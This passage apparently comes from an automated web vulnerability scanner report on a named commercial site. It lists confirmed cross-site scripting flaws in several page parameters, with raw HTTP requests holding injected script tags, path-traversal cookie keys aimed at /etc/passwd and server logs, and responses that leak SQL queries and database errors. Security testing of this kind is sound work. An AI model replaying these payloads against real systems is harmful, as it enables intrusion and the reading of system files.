OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=uduhhoga4dmaacq3nsuten69a5; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005DD)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005E2)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/obtm00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005E2)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8rh9pichdf7bfld1a60cn2eme0; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET '"--></style></script><script>alert(0x0005E5)</script>

Request

GET /ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005E5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rnf1crtqemb7egb23m8c3rlff1; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E5)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005E3)</script>

Request

GET /ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005E3)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 